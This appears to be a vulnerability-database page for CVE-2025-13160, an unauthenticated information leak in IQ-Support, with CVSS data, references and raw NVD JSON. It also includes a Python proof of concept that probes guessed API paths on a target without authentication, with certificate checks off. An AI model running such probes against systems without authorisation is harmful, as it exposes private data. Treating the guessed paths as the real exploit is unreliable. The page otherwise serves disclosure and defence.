CVE-2025-13160

Description

IQ-Support developed by IQ Service International has a Exposure of Sensitive Information vulnerability, allowing unauthenticated remote attackers to access specific APIs to obtain sensitive information from the internal network.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

IQ-Support (all versions before patch)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-13160 PoC - IQ-Support Information Disclosure
# Target: IQ-Support by IQ Service International
# Vulnerability: Unauthenticated API access leading to sensitive information disclosure

def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-13160
    """
    # Common API endpoints that might expose sensitive information
    api_endpoints = [
        '/api/users',
        '/api/config',
        '/api/system/info',
        '/api/admin/users',
        '/api/v1/support/tickets',
        '/api/internal/network'
    ]
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json'
    }
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-13160 - IQ-Support Information Disclosure\n")
    
    for endpoint in api_endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)
            
            if response.status_code == 200:
                content_type = response.headers.get('Content-Type', '')
                if 'application/json' in content_type:
                    print(f"[!] Potential vulnerability found!")
                    print(f"[!] Endpoint: {endpoint}")
                    print(f"[!] Status Code: {response.status_code}")
                    try:
                        json_data = response.json()
                        print(f"[!] Response preview: {str(json_data)[:200]}...")
                        return True
                    except:
                        print(f"[!] Response accessible without authentication")
                        
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {endpoint}: {e}")
            
    print("[*] No obvious vulnerability indicators found")
    return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13160
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13160
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13160/
[4] VulDB https://vuldb.com/cve/CVE-2025-13160
[5] https://www.twcert.org.tw/en/cp-139-10502-11c6d-2.html
[6] https://www.twcert.org.tw/tw/cp-132-10501-a25a6-1.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13160", "sourceIdentifier": "[email protected]", "published": "2025-11-14T04:15:54.650", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "IQ-Support developed by IQ Service International has a Exposure of Sensitive Information vulnerability, allowing unauthenticated remote attackers to access specific APIs to obtain sensitive information from the internal network."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-497"}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10502-11c6d-2.html", "source": "[email protected]"}, {"url": "https://www.twcert.org.tw/tw/cp-132-10501-a25a6-1.html", "source": "[email protected]"}]}}